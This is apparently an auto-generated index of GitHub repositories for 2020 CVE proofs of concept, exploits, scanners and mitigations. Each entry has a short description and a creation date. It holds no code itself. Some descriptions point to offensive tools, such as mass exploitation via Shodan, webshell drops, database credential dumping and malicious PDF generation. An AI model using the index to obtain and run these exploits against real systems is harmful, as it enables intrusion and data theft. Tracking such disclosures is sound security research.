**(CVE-2019-16759) vBulletin_Routestring-RCE** : [ludy-dev/vBulletin_Routestring-RCE](https://github.com/ludy-dev/vBulletin_Routestring-RCE) create time: 2020-08-31T13:44:15Z

**PoC of Full Account Takeover on RAD SecFlow-1v** : [UrielYochpaz/CVE-2020-13259](https://github.com/UrielYochpaz/CVE-2020-13259) create time: 2020-08-31T13:22:21Z

**Explanation and PoC for CVE-2020-16152** : [eriknl/CVE-2020-16152](https://github.com/eriknl/CVE-2020-16152) create time: 2020-08-30T12:18:12Z

**Python script to generate malicious PDFs for foxit reader 9.0.1.1049 (CVE: 2018-9958)** : [CrossedWires/foxit-pdf-generator](https://github.com/CrossedWires/foxit-pdf-generator) create time: 2020-08-29T20:26:02Z

**Tool to test for existence of CVE-2020-8218** : [withdk/pulse-gosecure-rce-poc](https://github.com/withdk/pulse-gosecure-rce-poc) create time: 2020-08-29T16:40:35Z

**CVE Repository for HTTP DeSynchronization Attacks** : [mosesrenegade/CVE-2018-8004](https://github.com/mosesrenegade/CVE-2018-8004) create time: 2020-08-29T14:52:09Z

**Jenkins远程代码执行** : [xDro1d/CVE-2018-1000861](https://github.com/xDro1d/CVE-2018-1000861) create time: 2020-08-28T15:18:19Z

**no description** : [Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure](https://github.com/Parcer0/CVE-2005-0603-phpBB-2.0.12-Full-path-disclosure) create time: 2020-08-28T15:01:49Z

**[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)** : [murataydemir/CVE-2017-9822](https://github.com/murataydemir/CVE-2017-9822) create time: 2020-08-28T12:45:44Z

**no description** : [TakuCoder/CVE-2018-6574](https://github.com/TakuCoder/CVE-2018-6574) create time: 2020-08-28T11:32:45Z

**An exploit for CVE-2019-17026. It pops xcalc and was tested on Ubuntu (x64).** : [maxpl0it/CVE-2019-17026-Exploit](https://github.com/maxpl0it/CVE-2019-17026-Exploit) create time: 2020-08-27T19:32:07Z

**This CVE-2018-8120 File** : [StartZYP/CVE-2018-8120](https://github.com/StartZYP/CVE-2018-8120) create time: 2020-08-27T07:10:34Z

**Directory traversal in com_media to RCE** : [HoangKien1020/CVE-2020-24597](https://github.com/HoangKien1020/CVE-2020-24597) create time: 2020-08-26T02:31:21Z

**no description** : [Nacromencer/cve2017-0199-in-python](https://github.com/Nacromencer/cve2017-0199-in-python) create time: 2020-08-25T20:40:35Z

**no description** : [lcartey/proftpd-cve-2019-12815](https://github.com/lcartey/proftpd-cve-2019-12815) create time: 2020-08-25T13:58:38Z

**no description** : [0neb1n/CVE-2020-1493](https://github.com/0neb1n/CVE-2020-1493) create time: 2020-08-25T05:25:45Z

**CVE-2020-5902** : [ltvthang/CVE-2020-5903](https://github.com/ltvthang/CVE-2020-5903) create time: 2020-08-25T02:07:41Z

**CVE-2020-0022 vulnerability exploitation on Bouygues BBox Miami (Android TV 8.0 - ARM32 Cortex A9)** : [Polo35/CVE-2020-0022](https://github.com/Polo35/CVE-2020-0022) create time: 2020-08-24T19:33:10Z

**no description** : [sunian19/CVE-2019-16759](https://github.com/sunian19/CVE-2019-16759) create time: 2020-08-24T16:15:10Z

**Kernel crash caused by out-of-bounds write in Apple's ICMP packet-handling code (CVE-2018-4407)** : [Fans0n-Fan/CVE-2018-4407](https://github.com/Fans0n-Fan/CVE-2018-4407) create time: 2020-08-24T13:35:28Z

**no description** : [lb0x/cve-2020-24572](https://github.com/lb0x/cve-2020-24572) create time: 2020-08-23T06:58:04Z

**no description** : [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://github.com/victomteng1997/cve-2020-7471-Time_Blind_SQLi-) create time: 2020-08-22T14:23:08Z

**CVE-2017-8570 Exp及利用样本分析** : [erfze/CVE-2017-0261](https://github.com/erfze/CVE-2017-0261) create time: 2020-08-22T03:01:51Z

**CVE-2006-0450. phpBB 2.0.19 and earlier allows remote attackers to cause a denial of service (application crash) by (1) registering many users through profile.php or (2) using search.php to search in a certain way that confuses the database.** : [Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities](https://github.com/Parcer0/CVE-2006-0450-phpBB-2.0.15-Multiple-DoS-Vulnerabilities) create time: 2020-08-21T09:50:57Z

**no description** : [ctlyz123/CVE-2020-17496](https://github.com/ctlyz123/CVE-2020-17496) create time: 2020-08-20T12:20:03Z

**CVE-2019-0230 & s2-059 poc.** : [ramoncjs3/CVE-2019-0230](https://github.com/ramoncjs3/CVE-2019-0230) create time: 2020-08-20T08:21:54Z

**Details of CVE-2020-14292** : [alwentiu/CVE-2020-14292](https://github.com/alwentiu/CVE-2020-14292) create time: 2020-08-20T05:24:30Z

**no description** : [starling021/CVE-2019-11932-SupportApp](https://github.com/starling021/CVE-2019-11932-SupportApp) create time: 2020-08-20T02:45:40Z

**[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload Handler) .NET JSON Deserialization** : [murataydemir/CVE-2019-18935](https://github.com/murataydemir/CVE-2019-18935) create time: 2020-08-19T17:11:02Z

**no description** : [minutesinch/CVE-2020-0041-Original](https://github.com/minutesinch/CVE-2020-0041-Original) create time: 2020-08-19T14:45:28Z

**no description** : [minutesinch/CVE-2020-0041](https://github.com/minutesinch/CVE-2020-0041) create time: 2020-08-19T14:44:48Z

**WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册蚁剑filter内存shell** : [Y4er/WebLogic-Shiro-shell](https://github.com/Y4er/WebLogic-Shiro-shell) create time: 2020-08-19T03:34:06Z

**no description** : [superzerosec/cve-2020-5902](https://github.com/superzerosec/cve-2020-5902) create time: 2020-08-18T15:04:08Z

**no description** : [Logeirs/CVE-2018-0114](https://github.com/Logeirs/CVE-2018-0114) create time: 2020-08-18T00:52:39Z

**no description** : [cyberharsh/PHP_CVE-2012-1823](https://github.com/cyberharsh/PHP_CVE-2012-1823) create time: 2020-08-17T19:54:11Z

**[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)** : [murataydemir/CVE-2020-0688](https://github.com/murataydemir/CVE-2020-0688) create time: 2020-08-17T12:41:51Z

**Speculative Load Hazards Boost Rowhammer and Cache Attacks - CVE-2019-0162 -** : [saadislamm/SPOILER](https://github.com/saadislamm/SPOILER) create time: 2020-08-17T02:30:51Z

**This tools will extracts and dumps Email + SMTP from vBulletin database server** : [mas1337/CVE-2019-16759](https://github.com/mas1337/CVE-2019-16759) create time: 2020-08-16T18:17:33Z

**no description** : [dwisiswant0/CVE-2020-9496](https://github.com/dwisiswant0/CVE-2020-9496) create time: 2020-08-15T14:29:49Z

**Regular expression matching for URL's. Maintained, safe, and browser-friendly version of url-regex. Resolves CVE-2020-7661 for Node.js servers.** : [niftylettuce/url-regex-safe](https://github.com/niftylettuce/url-regex-safe) create time: 2020-08-15T07:42:50Z

**Telia Technicolor TG389ac v.17.1.7992 Samba privilege escalation exploit** : [full-disclosure/FDEU-CVE-2020-1FC5](https://github.com/full-disclosure/FDEU-CVE-2020-1FC5) create time: 2020-08-14T11:47:37Z

**Vbulletin RCE Exploit** : [nako48/CVE-2019-16759](https://github.com/nako48/CVE-2019-16759) create time: 2020-08-13T19:11:37Z

**Modero AMX Code Execution (CVE-2019–11224)** : [Insecurities/CVE-2019-11224](https://github.com/Insecurities/CVE-2019-11224) create time: 2020-08-13T19:07:36Z

**CVE-2019-0230 Exploit POC** : [PrinceFPF/CVE-2019-0230](https://github.com/PrinceFPF/CVE-2019-0230) create time: 2020-08-13T15:18:32Z

**no description** : [fengziHK/CVE-2019-0230](https://github.com/fengziHK/CVE-2019-0230) create time: 2020-08-13T13:31:52Z

**CVE-2019-0230 Exploit** : [A2gel/CVE-2019-0230](https://github.com/A2gel/CVE-2019-0230) create time: 2020-08-13T13:05:36Z

**S2-059 CVE-2019-0230** : [gitworldhero/CVE-2019-0230](https://github.com/gitworldhero/CVE-2019-0230) create time: 2020-08-13T12:59:23Z

**[CVE-2016-2386] SAP NetWeaver AS JAVA UDDI Component SQL Injection** : [murataydemir/CVE-2016-2386](https://github.com/murataydemir/CVE-2016-2386) create time: 2020-08-13T12:07:09Z

**[CVE-2016-4014] SAP Netweaver AS JAVA UDDI Component XML External Entity (XXE)** : [murataydemir/CVE-2016-4014](https://github.com/murataydemir/CVE-2016-4014) create time: 2020-08-13T11:51:37Z

**[CVE-2020-6287] SAP NetWeaver AS JAVA (LM Configuration Wizard) Authentication Bypass (Create Simple & Administrator Java User)** : [murataydemir/CVE-2020-6287](https://github.com/murataydemir/CVE-2020-6287) create time: 2020-08-13T09:12:37Z

**IBM Maximo Asset Management is vulnerable to Information Disclosure via XXE Vulnerability (CVE-2020-4463)** : [Ibonok/CVE-2020-4463](https://github.com/Ibonok/CVE-2020-4463) create time: 2020-08-13T09:03:40Z

**[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal** : [murataydemir/CVE-2020-6286](https://github.com/murataydemir/CVE-2020-6286) create time: 2020-08-13T09:00:12Z

**[CVE-2020-5902] F5 BIG-IP Remote Code Execution (RCE)** : [murataydemir/CVE-2020-5902](https://github.com/murataydemir/CVE-2020-5902) create time: 2020-08-13T08:27:25Z

**[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cisco Firepower Threat Defense (FTD) Web Service Read-Only Directory Traversal** : [murataydemir/CVE-2020-3452](https://github.com/murataydemir/CVE-2020-3452) create time: 2020-08-13T08:22:27Z

**no description** : [jd-961/CVE-2019-16759-bypass](https://github.com/jd-961/CVE-2019-16759-bypass) create time: 2020-08-12T16:18:14Z

**Ldap Injection in PegaSystem 8.2 or less** : [IAG0110/CVE-2019-16374](https://github.com/IAG0110/CVE-2019-16374) create time: 2020-08-12T16:06:59Z

**no description** : [Tobey123/CVE-2020-1472-visualizer](https://github.com/Tobey123/CVE-2020-1472-visualizer) create time: 2020-08-12T12:35:56Z

**poc for CVE-2020-1337 (Windows Print Spooler Elevation of Privilege)** : [sailay1996/cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc) create time: 2020-08-12T10:05:36Z

**CVE-2020-1048 bypass: binary planting PoC** : [neofito/CVE-2020-1337](https://github.com/neofito/CVE-2020-1337) create time: 2020-08-11T14:34:07Z

**CVE-2020-1337 a bypass of (PrintDemon) CVE-2020-1048’s patch** : [VoidSec/CVE-2020-1337](https://github.com/VoidSec/CVE-2020-1337) create time: 2020-08-11T12:22:56Z

**任意文件上传(Weblogic)CVE-2018-2894** : [changpin666com/CVE-2018-2894-Weblogic-](https://github.com/changpin666com/CVE-2018-2894-Weblogic-) create time: 2020-08-11T04:12:09Z

**no description** : [hhj4ck/CVE-2016-2067](https://github.com/hhj4ck/CVE-2016-2067) create time: 2020-08-10T23:22:27Z

**no description** : [j4nn/CVE-2020-0041](https://github.com/j4nn/CVE-2020-0041) create time: 2020-08-10T21:34:16Z

**CVE-2016-4010** : [shadofren/CVE-2016-4010](https://github.com/shadofren/CVE-2016-4010) create time: 2020-08-10T14:17:56Z

**CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2019-2890漏洞POC** : [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln) create time: 2020-08-10T09:17:04Z

**CVE-2018-7600 | Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' RCE** : [ruthvikvegunta/Drupalgeddon2](https://github.com/ruthvikvegunta/Drupalgeddon2) create time: 2020-08-10T02:46:18Z

**CVE-2016-2555** : [shadofren/CVE-2016-2555](https://github.com/shadofren/CVE-2016-2555) create time: 2020-08-09T22:15:43Z

**no description** : [cudi1999/CVE-2020-6514](https://github.com/cudi1999/CVE-2020-6514) create time: 2020-08-09T20:06:50Z

**Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3** : [PushpenderIndia/CVE-2020-5902-Scanner](https://github.com/PushpenderIndia/CVE-2020-5902-Scanner) create time: 2020-08-09T11:46:23Z

**no description** : [PerimeterX/CVE-2020-6519](https://github.com/PerimeterX/CVE-2020-6519) create time: 2020-08-09T08:25:40Z

**Determine the Version Running on the Palo Alto Network Firewall for the Global Protect Portal** : [blackhatethicalhacking/CVE-2020-2034-POC](https://github.com/blackhatethicalhacking/CVE-2020-2034-POC) create time: 2020-08-08T14:19:44Z

**Webmin <=1.920 RCE** : [ruthvikvegunta/CVE-2019-15107](https://github.com/ruthvikvegunta/CVE-2019-15107) create time: 2020-08-08T10:17:03Z

**漏洞复现** : [seethen/cve-2018-2628](https://github.com/seethen/cve-2018-2628) create time: 2020-08-07T08:56:21Z

**no description** : [potats0/cve_2020_14644](https://github.com/potats0/cve_2020_14644) create time: 2020-08-07T03:42:37Z

**Pi-hole ( <= 4.3.2) authenticated remote code execution.** : [team0se7en/CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816) create time: 2020-08-06T14:04:54Z

**CVE-2013-3214** : [shadofren/CVE-2013-3214](https://github.com/shadofren/CVE-2013-3214) create time: 2020-08-06T11:57:39Z

**CVE-2017-8570 Exp改造及样本分析** : [erfze/CVE-2017-8570](https://github.com/erfze/CVE-2017-8570) create time: 2020-08-06T09:12:37Z

**no description** : [Revanthinfosec/CVE-2020-BIG-IP](https://github.com/Revanthinfosec/CVE-2020-BIG-IP) create time: 2020-08-05T17:41:44Z

**PoC of CVE-2020-0108** : [CrackerCat/ServiceCheater](https://github.com/CrackerCat/ServiceCheater) create time: 2020-08-05T04:50:42Z

**This was converted from a metasploit module as an exercise for OSCP studying** : [cd6629/CVE-2012-2982-Python-PoC](https://github.com/cd6629/CVE-2012-2982-Python-PoC) create time: 2020-08-05T02:54:10Z

**Pi-hole Remote Code Execution authenticated Version >= 4.3.2** : [cybervaca/CVE-2020-8816](https://github.com/cybervaca/CVE-2020-8816) create time: 2020-08-04T10:23:28Z

**Solr_CVE-2019-17558** : [gsheller/Solr_CVE-2019-17558](https://github.com/gsheller/Solr_CVE-2019-17558) create time: 2020-08-04T06:13:33Z

**ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.** : [megamagnus/cve-2020-15956](https://github.com/megamagnus/cve-2020-15956) create time: 2020-08-04T03:27:24Z

**A dll hijacking vulnerability in zoom meeting < 5.1.4. CVE-2020-9767** : [shubham0d/Zoom-dll-hijacking](https://github.com/shubham0d/Zoom-dll-hijacking) create time: 2020-08-03T20:17:10Z

**no description** : [warferik/CVE-2019-3980](https://github.com/warferik/CVE-2019-3980) create time: 2020-08-03T14:12:56Z

**CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense** : [paran0id34/CVE-2020-3452](https://github.com/paran0id34/CVE-2020-3452) create time: 2020-08-03T11:02:23Z

**ActiveMQ_CVE-2015-5254** : [gsheller/ActiveMQ_CVE-2015-5254](https://github.com/gsheller/ActiveMQ_CVE-2015-5254) create time: 2020-08-03T05:51:52Z

**no description** : [Tempuss/CTF_CVE-2020-7471](https://github.com/Tempuss/CTF_CVE-2020-7471) create time: 2020-08-03T05:29:25Z

**Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection** : [mkelepce/CVE-2020-13996](https://github.com/mkelepce/CVE-2020-13996) create time: 2020-08-02T14:50:04Z

**Joomla! Plugin XCloner Backup 3.5.3 - Local File Inclusion (Authenticated)** : [mkelepce/CVE-2020-13424](https://github.com/mkelepce/CVE-2020-13424) create time: 2020-08-02T14:46:10Z

**Dolibarr 11.0.3 - Persistent Cross-Site Scripting** : [mkelepce/CVE-2020-13094](https://github.com/mkelepce/CVE-2020-13094) create time: 2020-08-02T14:43:43Z

**Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection** : [mkelepce/CVE-2020-15399](https://github.com/mkelepce/CVE-2020-15399) create time: 2020-08-02T14:35:26Z

**POC scanner for the Grafana vulnerability CVE-2019-15043** : [h0ffayyy/CVE-2019-15043](https://github.com/h0ffayyy/CVE-2019-15043) create time: 2020-08-01T21:31:46Z

**POC for CVE-2020-13151** : [b4ny4n/CVE-2020-13151](https://github.com/b4ny4n/CVE-2020-13151) create time: 2020-08-01T14:29:59Z

**CVE-2020-3452 exploit** : [0x5ECF4ULT/CVE-2020-3452](https://github.com/0x5ECF4ULT/CVE-2020-3452) create time: 2020-08-01T08:27:11Z

**修改IP地址即可实现命令执行** : [guanjivip/CVE-2017-8046](https://github.com/guanjivip/CVE-2017-8046) create time: 2020-08-01T05:15:42Z

**A local privilege escalation chain from user to kernel for MacOS < 10.15.5. CVE-2020–9854** : [A2nkF/unauthd](https://github.com/A2nkF/unauthd) create time: 2020-07-31T20:24:22Z

**ActiveMQ_putshell直接获取webshell** : [gsheller/ActiveMQ_putshell-CVE-2016-3088](https://github.com/gsheller/ActiveMQ_putshell-CVE-2016-3088) create time: 2020-07-31T09:06:15Z

**no description** : [ericisnotrealname/CVE-2018-8174_EXP](https://github.com/ericisnotrealname/CVE-2018-8174_EXP) create time: 2020-07-31T03:13:43Z

**Simple detection tool for Blueborne vulnerability found on Android devices --- CVE-2017-0781.** : [mjancek/BlueborneDetection](https://github.com/mjancek/BlueborneDetection) create time: 2020-07-30T21:06:19Z

**Shitrix : CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit** : [VladRico/CVE-2019-19781](https://github.com/VladRico/CVE-2019-19781) create time: 2020-07-30T17:37:40Z

**no description** : [ggolawski/CVE-2020-9495](https://github.com/ggolawski/CVE-2020-9495) create time: 2020-07-29T19:57:32Z

**Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability** : [optiv/CVE-2020-15931](https://github.com/optiv/CVE-2020-15931) create time: 2020-07-29T19:02:29Z

**CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script** : [Gh0st0ne/http-vuln-cve2020-3452.nse](https://github.com/Gh0st0ne/http-vuln-cve2020-3452.nse) create time: 2020-07-29T15:57:26Z

**Proof of concept exploit of Windows Update Orchestrator Service Elevation of Privilege Vulnerability** : [irsl/CVE-2020-1313](https://github.com/irsl/CVE-2020-1313) create time: 2020-07-29T15:56:50Z

**BootHole vulnerability (CVE-2020-10713). detection script, links and other mitigation related materials** : [eclypsium/BootHole](https://github.com/eclypsium/BootHole) create time: 2020-07-29T00:01:41Z

**环境下载** : [ChenZIDu/CVE-2020-14645](https://github.com/ChenZIDu/CVE-2020-14645) create time: 2020-07-28T13:05:13Z

**Better version of rastating.github.io/bludit-brute-force-mitigation-bypass/** : [triple-octopus/Bludit-CVE-2019-17240-Fork](https://github.com/triple-octopus/Bludit-CVE-2019-17240-Fork) create time: 2020-07-28T12:36:34Z

**no description** : [0neb1n/CVE-2020-1349](https://github.com/0neb1n/CVE-2020-1349) create time: 2020-07-28T11:33:38Z

**Cisco Adaptive Security Appliance and FTD Unauthorized Remote File Reading** : [MrCl0wnLab/checker-cve2020-3452](https://github.com/MrCl0wnLab/checker-cve2020-3452) create time: 2020-07-28T04:40:54Z

**no description** : [pry0cc/CVE-2020-3187](https://github.com/pry0cc/CVE-2020-3187) create time: 2020-07-28T00:59:06Z

**A network detection package for CVE-2020-5902, a CVE10.0 vulnerability affecting F5 Networks, Inc BIG-IP devices.** : [corelight/CVE-2020-5902-F5BigIP](https://github.com/corelight/CVE-2020-5902-F5BigIP) create time: 2020-07-28T00:43:14Z

**CVE-2020–9934 POC** : [mattshockl/CVE-2020-9934](https://github.com/mattshockl/CVE-2020-9934) create time: 2020-07-27T22:09:01Z

**Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API.** : [andripwn/CVE-2019-19781](https://github.com/andripwn/CVE-2019-19781) create time: 2020-07-27T15:09:51Z

**Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API.** : [andripwn/pulse-exploit](https://github.com/andripwn/pulse-exploit) create time: 2020-07-27T15:06:08Z

**tomcat-embed-core-9.0.31 CVE-2020-11996 Test PoC** : [rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996](https://github.com/rusakovichma/tomcat-embed-core-9.0.31-CVE-2020-11996) create time: 2020-07-27T13:22:21Z

**This exploit is remote code execution vulnerability in Ruby-on-Rails when using render on user-supplied data** : [danielhemmati/CVE-2016-2098-my-first-exploit](https://github.com/danielhemmati/CVE-2016-2098-my-first-exploit) create time: 2020-07-27T11:38:48Z

**no description** : [AnKItdo/CVE_2018-6574](https://github.com/AnKItdo/CVE_2018-6574) create time: 2020-07-27T03:23:07Z

**PoC for CVE-2019-16113 which affects Bludit, a flat-file CMS.** : [west-tek/CVE-2019-16113-PoC](https://github.com/west-tek/CVE-2019-16113-PoC) create time: 2020-07-26T04:47:41Z

**A registry-based workaround can be used to help protect an affected Windows server, and it can be implemented without requiring an administrator to restart the server. Because of the volatility of this vulnerability, administrators may have to implement the workaround before they apply the security update in order to enable them to update their systems by using a standard deployment cadence.** : [simeononsecurity/CVE-2020-1350-Fix](https://github.com/simeononsecurity/CVE-2020-1350-Fix) create time: 2020-07-26T02:12:36Z

**Course enrolments allowed privilege escalation from teacher role into manager role to RCE** : [HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321) create time: 2020-07-26T01:28:53Z

**Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices.** : [foulenzer/CVE-2020-3452](https://github.com/foulenzer/CVE-2020-3452) create time: 2020-07-25T16:11:55Z

**no description** : [KaLendsi/CVE-2020-1054](https://github.com/KaLendsi/CVE-2020-1054) create time: 2020-07-25T11:56:48Z

**没有编写完成,以后学习更多知识在回来完善** : [guanjivip/CVE-2015-8562](https://github.com/guanjivip/CVE-2015-8562) create time: 2020-07-25T07:05:28Z

**no description** : [mr-r3b00t/CVE-2020-3452](https://github.com/mr-r3b00t/CVE-2020-3452) create time: 2020-07-24T16:26:52Z

**CVE-2020-3452 Cisco ASA Scanner -unauth Path Traversal Check** : [PR3R00T/CVE-2020-3452-Cisco-Scanner](https://github.com/PR3R00T/CVE-2020-3452-Cisco-Scanner) create time: 2020-07-24T15:04:45Z

**unauth file read in cisco asa & firepower.** : [Loneyers/cve-2020-3452](https://github.com/Loneyers/cve-2020-3452) create time: 2020-07-24T05:56:32Z

**no description** : [XDev05/CVE-2020-3452-PoC](https://github.com/XDev05/CVE-2020-3452-PoC) create time: 2020-07-24T00:39:11Z

**Writeup of CVE-2020-15906** : [S1lkys/CVE-2020-15906](https://github.com/S1lkys/CVE-2020-15906) create time: 2020-07-23T09:20:53Z

**sap netweaver portal add user administrator** : [ynsmroztas/CVE-2020-6287-Sap-Add-User](https://github.com/ynsmroztas/CVE-2020-6287-Sap-Add-User) create time: 2020-07-22T18:06:02Z

**A powershell script to deploy the registry mitigation key for CVE-2020-1350** : [gdwnet/cve-2020-1350](https://github.com/gdwnet/cve-2020-1350) create time: 2020-07-22T12:11:33Z

**no description** : [makeross/CVE-2018-11235_pub](https://github.com/makeross/CVE-2018-11235_pub) create time: 2020-07-22T09:05:45Z

**no description** : [makeross/CVE-2018-11235](https://github.com/makeross/CVE-2018-11235) create time: 2020-07-22T08:41:03Z

**This is a PoC exploit for CVE-2020-8559 Kubernetes Vulnerability** : [tdwyer/CVE-2020-8559](https://github.com/tdwyer/CVE-2020-8559) create time: 2020-07-22T08:36:41Z

**Proof of Concept exploit for Kubernetes CVE-2020-8559** : [tabbysable/POC-2020-8559](https://github.com/tabbysable/POC-2020-8559) create time: 2020-07-22T05:13:01Z

**no description** : [d7x/CVE-2020-12432](https://github.com/d7x/CVE-2020-12432) create time: 2020-07-21T11:53:27Z

**CVE-2020-1337 Windows Print Spooler Privilege Escalation** : [math1as/CVE-2020-1337-exploit](https://github.com/math1as/CVE-2020-1337-exploit) create time: 2020-07-21T08:01:20Z

**no description** : [tz4678/cve-2020-9006](https://github.com/tz4678/cve-2020-9006) create time: 2020-07-21T05:39:58Z

**CVE-2014-4210 SSRF PORTSCANNER PoC** : [unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC](https://github.com/unmanarc/CVE-2014-4210-SSRF-PORTSCANNER-POC) create time: 2020-07-21T03:45:30Z

**PoC for CVE-2020-11896 Treck TCP/IP stack and device asset investigation** : [Fans0n-Fan/Treck20-Related](https://github.com/Fans0n-Fan/Treck20-Related) create time: 2020-07-21T03:38:31Z

**no description** : [Onapsis/CVE-2020-6287_RECON-scanner](https://github.com/Onapsis/CVE-2020-6287_RECON-scanner) create time: 2020-07-21T01:22:45Z

**Ported Exploit From Python To Golang** : [latortuga71/CVE-2018-6892-Golang](https://github.com/latortuga71/CVE-2018-6892-Golang) create time: 2020-07-20T23:50:41Z

**no description** : [illnino/CVE-2018-6574](https://github.com/illnino/CVE-2018-6574) create time: 2020-07-20T21:02:43Z

**no description** : [f5devcentral/cve-2020-5902-ioc-bigip-checker](https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker) create time: 2020-07-20T19:10:09Z

**PoC for CVE-2020-6287 The PoC in python for add user only, no administrator permission set. Inspired by @zeroSteiner from metasploit. Original Metasploit PR module: https://github.com/rapid7/metasploit-framework/pull/13852/commits/d1e2c75b3eafa7f62a6aba9fbe6220c8da97baa8 This PoC only create user with unauthentication permission and no more administrator permission set. This project is created only for educational purposes and cannot be used for law violation or personal gain. The author of this project is not responsible for any possible harm caused by the materials of this project. Original finding: CVE-2020-6287: Pablo Artuso CVE-2020-6286: Yvan 'iggy' G. Usage: python sap-CVE-2020-6287-add-user.py <HTTP(s)://IP:Port** : [duc-nt/CVE-2020-6287-exploit](https://github.com/duc-nt/CVE-2020-6287-exploit) create time: 2020-07-20T18:45:53Z

**no description** : [DaBoQuan/CVE-2020-14645](https://github.com/DaBoQuan/CVE-2020-14645) create time: 2020-07-20T11:40:09Z

**no description** : [bit4woo/CVE-2020-13925](https://github.com/bit4woo/CVE-2020-13925) create time: 2020-07-20T10:38:14Z

**Comprueba si su servidor DNS es vulnerable a la ejecución remota de código.** : [Secuora-Org/CVE-2020-1350-checker.ps1](https://github.com/Secuora-Org/CVE-2020-1350-checker.ps1) create time: 2020-07-20T09:12:07Z

**A basic proof of concept for CVE-2020-1350** : [Plazmaz/CVE-2020-1350-poc](https://github.com/Plazmaz/CVE-2020-1350-poc) create time: 2020-07-20T03:44:58Z

**Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()** : [Y4er/CVE-2020-14645](https://github.com/Y4er/CVE-2020-14645) create time: 2020-07-20T03:27:24Z

**DNS Vulnerability - CVE-2020-1350** : [CVEmaster/CVE-2020-1350](https://github.com/CVEmaster/CVE-2020-1350) create time: 2020-07-19T17:32:47Z

**no description** : [qianshuidewajueji/CVE-2019-0887](https://github.com/qianshuidewajueji/CVE-2019-0887) create time: 2020-07-19T12:03:44Z

**no description** : [Iamgublin/CVE-2020-1054](https://github.com/Iamgublin/CVE-2020-1054) create time: 2020-07-19T08:20:57Z

**Enviroment and exploit to rce test** : [h4ms1k/CVE-2020-8163](https://github.com/h4ms1k/CVE-2020-8163) create time: 2020-07-18T18:42:23Z

**Scanner and Mitigator for CVE 2020-1350** : [graph-inc/CVE-2020-1350](https://github.com/graph-inc/CVE-2020-1350) create time: 2020-07-18T13:49:54Z

**no description** : [cpandya2909/CVE-2020-15778](https://github.com/cpandya2909/CVE-2020-15778) create time: 2020-07-18T05:15:05Z

**Disables AJP connectors to remediate CVE-2020-1938!** : [MateoSec/ghostcatch](https://github.com/MateoSec/ghostcatch) create time: 2020-07-17T23:34:47Z

**Crafting raw TCP/IP packets to send to poorly configured servers - CVE-2020-8558 PoC** : [rhysemmas/martian-packets](https://github.com/rhysemmas/martian-packets) create time: 2020-07-17T14:59:55Z

**no description** : [nondejus/CVE-2017-12842](https://github.com/nondejus/CVE-2017-12842) create time: 2020-07-17T13:52:59Z

**no description** : [nondejus/CVE-2013-5700](https://github.com/nondejus/CVE-2013-5700) create time: 2020-07-17T13:50:53Z

**no description** : [nondejus/CVE-2018-20586](https://github.com/nondejus/CVE-2018-20586) create time: 2020-07-17T13:49:15Z

**no description** : [nondejus/CVE-2020-14199](https://github.com/nondejus/CVE-2020-14199) create time: 2020-07-17T13:48:01Z

**Bludit Exploitation Via upload Image.php** : [itsjeffersonli/CVE-2019-16113](https://github.com/itsjeffersonli/CVE-2019-16113) create time: 2020-07-17T13:37:20Z

**Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-19781** : [w4fz5uck5/CVE-2019-19781-CitrixRCE](https://github.com/w4fz5uck5/CVE-2019-19781-CitrixRCE) create time: 2020-07-17T11:52:36Z

**writeup of CVE-2020-1362** : [Q4n/CVE-2020-1362](https://github.com/Q4n/CVE-2020-1362) create time: 2020-07-17T07:35:05Z

**CVE-2020-1350 Proof-of-Concept** : [connormcgarr/CVE-2020-1350](https://github.com/connormcgarr/CVE-2020-1350) create time: 2020-07-17T05:41:19Z

**GUI** : [rockmelodies/CVE-2020-5902-rce-gui](https://github.com/rockmelodies/CVE-2020-5902-rce-gui) create time: 2020-07-17T03:13:30Z

**Denial of Service PoC for CVE-2020-1350 (SIGRed)** : [captainGeech42/CVE-2020-1350](https://github.com/captainGeech42/CVE-2020-1350) create time: 2020-07-16T16:46:48Z

**EXP for CVE-2018-1297** : [Al1ex/CVE-2018-1297](https://github.com/Al1ex/CVE-2018-1297) create time: 2020-07-16T06:20:01Z

**Environment for CVE_2019_17571** : [Al1ex/CVE_2019_17571](https://github.com/Al1ex/CVE_2019_17571) create time: 2020-07-16T04:01:40Z

**A denial-of-service proof-of-concept for CVE-2020-1350** : [maxpl0it/CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS) create time: 2020-07-15T23:00:00Z

